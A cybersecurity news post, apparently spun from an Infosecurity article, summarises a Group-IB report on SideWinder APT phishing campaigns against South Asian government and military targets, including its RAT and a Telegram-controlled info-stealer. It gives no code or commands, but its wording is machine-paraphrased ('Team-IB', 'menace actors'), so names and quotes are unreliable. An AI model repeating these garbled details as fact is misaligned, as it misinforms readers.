• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
Cyber Security News

SideWinder APT Attacks Regional Targets in New Campaign

You are here: Home / General Cyber Security News / SideWinder APT Attacks Regional Targets in New Campaign
February 15, 2023

Security scientists have found dozens of new regional targets and new cyber-attack instruments joined to Indian APT team SideWinder.

The suspected state-sponsored group – also recognized as Rattlesnake, Hardcore Nationalist (HN2) and T-APT4 – comes less than the spotlight in a new report from Team-IB, Outdated snake, new skin: Analysis of SideWinder APT exercise between June and November 2021.

For the duration of the 6-month interval, the risk intelligence company uncovered SideWinder menace actors attempted to attack 61 government, military, regulation enforcement and other targets in Afghanistan, Bhutan, Myanmar, Nepal and Sri Lanka.

✔ Approved From Our Partners
AOMEI Backupper Lifetime

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.

Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


It also connected the team to a 2020 attack on the government of the Maldives.

SideWinder’s threat vector of alternative remains spear-phishing email messages, which it fired at these targets during the period of time. Two campaigns highlighted email messages in which the APT team spoofed a cryptocurrency organization, Team-IB said.

If a sufferer clicks on a malicious backlink in the phishing email, it will subsequently obtain a destructive document, an LNK file or a destructive payload. The LNK file downloads an HTA file, which in transform downloads the payload. The payload itself could be a reverse shell, a remote entry Trojan (RAT) or an information stealer, the report claimed.

Team-IB found two new house-grown tools made use of by SideWinder in the course of the marketing campaign: a RAT dubbed SideWinder.RAT.b and an info-stealer it called SideWinder.StealerPy.

The latter is designed to harvest Google Chrome searching historical past, credentials saved in the browser, the record of folders in the listing, meta information and the contents of docx, pdf, txt data files, and additional.

Equally custom made resources use Telegram to connect with compromised concentrate on machines somewhat than classic C&C servers, as it’s a lot more hassle-free to do so, Group-IB said.

Following analyzing the network infrastructure employed by SideWinder, the seller claimed it was in all probability the very same entity as the BabyElephant APT group.

“It is not unheard of for APT teams to borrow instruments from each other, which normally sales opportunities to issues in attribution,” claimed Dmitry Kupin, Team-IB senior malware analyst.

“As this sort of, we identified that some indicators of compromise associated to a different APT team, Donot, have been wrongly attributed to SideWinder. Nonetheless, we discovered additional evidence confirming that Patchwork (Hangover), Donot and SideWinder sometimes borrow instruments and malicious paperwork from each and every other and modify them for their demands.”

Team-IB was not able to say how several of SideWinder’s phishing attempts had been successful.


Some parts of this posting are sourced from:
www.infosecurity-journal.com

Previous Post: «regular pen testing is key to resolving conflict between secops Regular Pen Testing Is Key to Resolving Conflict Between SecOps and DevOps
Next Post: SAS App and Website Hit as Attacks Target Swedish Firms Cyber Security News»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • BREAKING: 7,000-Device Proxy Botnet Using IoT, EoL Systems Dismantled in U.S. – Dutch Operation
  • Initial Access Brokers Target Brazil Execs via NF-e Spam and Legit RMM Trials
  • Deploying AI Agents? Learn to Secure Them Before Hackers Strike Your Business
  • Malicious npm Packages Infect 3,200+ Cursor Users With Backdoor, Steal Credentials
  • Beyond Vulnerability Management – Can You CVE What I CVE?
  • Google Rolls Out On-Device AI Protections to Detect Scams in Chrome and Android
  • Chinese Hackers Exploit SAP RCE Flaw CVE-2025-31324, Deploy Golang-Based SuperShell
  • 38,000+ FreeDrain Subdomains Found Exploiting SEO to Steal Crypto Wallet Seed Phrases
  • SonicWall Patches 3 Flaws in SMA 100 Devices Allowing Attackers to Run Code as Root
  • Qilin Leads April 2025 Ransomware Spike with 45 Breaches Using NETXLOADER Malware

Copyright © TheCyberSecurity.News, All Rights Reserved.